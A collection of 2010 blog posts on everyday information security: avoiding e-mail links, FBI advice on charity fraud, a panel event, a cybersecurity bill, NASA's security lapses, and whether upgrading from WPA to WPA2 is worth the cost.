Friday, February 12, 2010

Stop clicking

I know this isn’t sexy cutting edge security stuff and it’s super basic to most some of you out there. However, the most common path for bad things to get onto your computer is by you inviting them in. So, most some of you need a refresher on web and e-mail dangers.
What prompted this line of thought was the FBI and the National Center for Disaster Fraud (NCDF) providing a press release that gives people that wish to donate to a disaster relief fund a list of items to watch for. (Aside: sad that there is a need for an organization like the NCDF)
While absolutely essential for any kind of donation effort, much of it is good practice for navigating e-mail and the web at anytime.
For me, the biggest advice I can give is this:
Do NOT click on a link in an e-mail.
If the link is to - I open a separate browser and type in and see if I can navigate to the specific page that I need. If I cannot navigate to the page, then I will type in the complete link into a browser.
The reason to avoid clicking on a link in an e-mail is because where the link SAYS it is going and where it actually TAKES you can be two VERY different things. The actual place that you end up based upon the underlying HTML code of the link, not on the words you click on.
Just to prove my point, if I put in this blog and you click on it (against my earlier advice – you can click on it), it will take you to an archive of my earlier blog on Technology Security hosted at Typepad.
Real simple, do not click on a link in an e-mail. Even if it is from someone you know!
Ok – here is what the FBI recommends - enjoy:
  • Do not respond to any unsolicited (spam) incoming emails, including clicking links contained within those messages
  • Be skeptical of individuals representing themselves as surviving victims or officials asking for donations via email or social networking sites
  • Beware of organizations with copycat names similar to but not exactly the same as those of reputable charities
  • Rather than following a purported link to a website, verify the legitimacy of nonprofit organizations by using various Internet-based resources to confirm the group’s existence and its nonprofit status
  • Be cautious of emails that claim to show pictures of the disaster areas in attached files, because the files may contain viruses. Open attachments only from known senders.
  • To ensure your money is received and used for its intended purposes, make contributions directly to known organizations rather than relying on others to make the donation on your behalf
  • Do not be pressured into making contributions, as reputable charities do not use such tactics
  • Do not give your personal or financial information to anyone who solicits contributions. Providing such information may compromise your identity and make you vulnerable to identity theft. 
  • Avoid cash donations if possible. Pay by debit or credit card, or write a check directly to the charity. Do not make checks payable to individuals.

Texas Lycium and Cyber Security

I attended an event at the Majestic Theater in downtown San Antonio last Friday night with the subject: "Our Growing Lives Online: Safe or Not?" The event was hosted by the Texas Lycium organization and was to debate whether our current laws and technologies adequately protect our data and identities online.

It was an interesting group that was assembled and for those interested in watching the discussion, it will be broadcast in the major markets in Texas on PBS sometime over the next month or so (Feb. 18th @ 8:00 PM on KLRU in Austin). The speakers were a good fit of business, policy, and research. I had the opportunity to speak with one of the panelists, Dr. Nicole Beebe, at another event this past Monday. We both agreed that the Q&A session was far too short and that we would have liked the social engineering aspects of cyber security explored at some level.



My view on cyber security is that it is 20% technology, policies, standards, guidelines, and procedures and the other 80% = making sure everyone is aware of the policies, standards, guidelines, procedures and that everyone knows how to use the security technologies.

As with many things, education is the key.



Bill Morrow, of CSIdentity was an intertaining character that livened up the conversation and Ari Schwartz provided solid government policy and legislation data. Robert Hansen of SecTheory may have seemed a little more BlackHat then he wanted to when trying to prove he had street-cred with all the crackers out there. Dr. Beebe presented excellent comments on data privacy vs usage both from an academic and investigative perspective. No doubt she has (or would love to) track down some of Mr. Hansen's friends...

Overall, I highly recommend watching it or setting it to record on your DVR. I'll be the shining head smack-dab in the middle of the audience.

Michael Mongold

Friday, February 5, 2010

Cybersecurity Enhancement Act of 2009 Passes the House 422-5

Over the next four years, each American will pay 75 cents per year to fund projects that will require more extensive data security standards - that is if it receives a similar reception in the Senate as it did in the House on Thursday.

H.R. 4061 calls out the National Science Foundation and NIST in particular, to bolster cybersecurity research and enhance data asset protection schemas. The Office of Management and Budget states that Federal security agencies spend roughly 10% of their IT infrastructure budget on cybersecurity or roughly $6 billion per year.

NIST (National Institute of Standards and Technology) will be required to develop "checklists of settings and options that minimize security risks associated with computer systems that are, or are likely to become, widely used within the federal government."

Special to my interest is the directive to:
"establish a program to support development of technical standards, metrology, testbeds, and conformance criteria with regard to identity management research and development" 
The funding to support research of cybersecurity initiatives is a welcome sight and well-timed with the increase in cyberattacks from Chinese and Iranian sources. The expectation is, and should be, that any significant physical attack on the United States will be coordinated with a significant attack on our information infrastructure.

Hopefully the funding and political stamina will continue to flow as cyber threats to our nation continue to evolve.

NASA still struggling with IT Security

Some time ago, I snarkely stated that InfoSec is not rocket science. Apparently it's much harder than that. According to the GOA director for acquisition and sourcing management, Cristina Chaplain's testimony before a House panel, NASA's IT Security is still having hiccups. As reported back in June, NASA fubar'd their PIV deployment and cost the taxpayers an additional $1 million dollars. Now, it looks like they are having difficulties controlling patching and AV implementations.

According to the testimony during 2007 and 2008, NASA reported over 1100 realized exploits where non-authorized access was obtained on sensitive information and malicious code was installed on NASA systems.

The deficiencies present real and credible dangers to NASA personnel and their operations. With these exploits, the opportunity to access, modify, or delete "mission critical" information is quantifiable.

If true, Ms. Chaplain's provides a ray of hope for the embattled organization:

"The deputy administrator also stated that NASA will continue to mitigate the information security weaknesses identified. The actions identified by the deputy administrator, if effectively implemented, will improve the agency's information security program."
It is typical for businesses and government organizations to be concerned about the integrity of their data, but few other scenarios could create a more tangible need for the availability and accuracy of  their assets than in a multi-billion dollar venture where lives are at stake.

Let's hope that future news about NASA's IT Security is lauding their standing as an InfoSec role model rather than trying explain its role in a tragedy.

Tuesday, February 2, 2010

WPA vs WPA2 - Worth the upgrade?

BLUF: WPA (Wi-Fi Protected Access) only supports TKIP (Temporal Key Integrity Protocol) which has been weakened a couple of times. It is expected that since it was built on the old WPA technology, that more weaknesses will be found.

WPA2 uses AES (Advanced Encryption Standard) and is considered unbreakable (for now).

However, is it worth the cost and trouble to upgrade?

When prioritizing what fires to fight within my organization, I break it down to:

How much does the safeguard cost? What is the likelyhood that the exploit will be realized? and finally - How much would the exploit cost if realized?

That's usually the order I look at things. How much is this going to run me? Is it really that likely? Only then do I look at the value proposition of the solution against the exploit cost so I can push it up to the bean counters.

Also, if we have a number of WAPs (Wireless Access Points) deployed that can run WPA but not WPA2, then migrating to WPA2 will affect my budget beyond man hours.

Why do so many legacy WAPs run WPA and not WPA2? Because WPA was an excellent solution made to exist on wimpy WEP hardware. WPA uses TKIP which is not very resource intensive. WPA2, on the other hand, uses AES which is incredibly robust but at a price. Hardware that could handle the processing needs of TKIP just don't have the oomph to crunch AES.

This means, if you're legacy hardware falls into this category, then migrating to WPA2 is not quite as trivial of a task.

So let's get back to our decision...

First you must look at the weaknesses of WPA. In order to exploit WPA, someone would need to be incredibly motivated to try and break TKIP. If someone wants in THAT bad, they’ll probably find another way to get what they want. Plus, the exploits of TKIP that have been reported are limited and more complex than the vast majority of bad guys out there are capable of. That doesn't mean that someone won't leverage TKIP's weaknesses to hax0r your intertubz but it does make it significantly less likely.

I believe in the "electric hacker" theory when it comes to threat agents. The vast majority of the time, someone trying to access your assets is going to take whichever path provides the least amount of resistance. Just like electricity. Least effort will usually be the motivating factor in what exploits will be attempted. It doesn't mean that there aren't some overachieving miscreants out there, just means that there are not a lot of them and they are probably focused on more rewarding booty than what you can provide.

If you are looking at upgrading 10 WAPs at $700 each you will spend seven grand plus the man hours to deploy these new devices. If you have the budget and the time then you might as well. However, most organizations I know are not blessed in that way. Time and money are tight and you have to fight the fires with what limited resources you have.

My pragmatic opinion is: The threat is not likely enough to spend the money and time to mitigate the risk. Most infosec teams have more pressing issues to address.

Your thoughts?

Michael Mongold